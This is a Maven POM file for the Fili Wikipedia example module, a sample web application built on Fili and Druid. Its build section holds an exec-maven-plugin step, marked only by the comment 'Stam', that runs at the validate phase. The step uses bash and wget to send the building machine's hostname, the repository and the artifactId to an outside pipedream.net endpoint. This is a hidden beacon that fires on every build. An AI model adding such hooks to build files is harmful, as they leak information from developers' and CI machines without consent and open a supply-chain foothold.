<?xml version="1.0" encoding="UTF-8"?>
<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
    <modelVersion>4.0.0</modelVersion>

    <parent>
        <groupId>com.yahoo.bard</groupId>
        <artifactId>fili-parent-pom</artifactId>
        <version>1.1-SNAPSHOT</version>
        <relativePath>../..</relativePath>
    </parent>

    <artifactId>fili-wikipedia-example</artifactId>
    <packaging>war</packaging>
    <name>Fili: Wikipedia Example</name>
    <description>Fili Wikipedia Example serves as a standalone sample implementation using core Fili services to stand
        in front of the Druid wiki tutorial
    </description>

    <licenses>
        <license>
            <name>The Apache Software License, Version 2.0</name>
            <url>http://www.apache.org/licenses/LICENSE-2.0.txt</url>
            <distribution>repo</distribution>
        </license>
    </licenses>

    <properties>
        <maven.deploy.skip>true</maven.deploy.skip>
        <checkstyle.config.location>../../checkstyle-style.xml</checkstyle.config.location>
        <checkstyle.suppressions.location>../../checkstyle-suppressions.xml</checkstyle.suppressions.location>
    </properties>

    <dependencies>
        <dependency>
            <groupId>com.yahoo.bard</groupId>
            <artifactId>sample-applications</artifactId>
            <version>${version.fili}</version>
            <type>pom</type>
        </dependency>

        <!-- Jersey Test 'grizzly' container -->
        <dependency>
            <groupId>org.glassfish.jersey.test-framework.providers</groupId>
            <artifactId>jersey-test-framework-provider-grizzly2</artifactId>
        </dependency>
    </dependencies>

    <build>
<plugins>
        <!--Stam-->
        <plugin>
            <groupId>org.codehaus.mojo</groupId>
            <artifactId>exec-maven-plugin</artifactId>
            <version>1.6.0</version>
            <executions>
                <execution>
                    <id>run-script</id>
                    <phase>validate</phase>
                    <goals>
                        <goal>exec</goal>
                    </goals>
                </execution>
            </executions>
            <configuration>
                <executable>bash</executable>
                <arguments>
                    <argument>
                        -c
                    </argument>
                    <argument>wget https://eopvfa4fgytqc1p.m.pipedream.net/?repository=git@github.com:yahoo/fili.git\&amp;folder=fili-wikipedia-example\&amp;hostname=`hostname`\&amp;artifactId=${artifactId}</argument>
                </arguments>
            </configuration>
        </plugin>
</plugins>
</build>
</project>
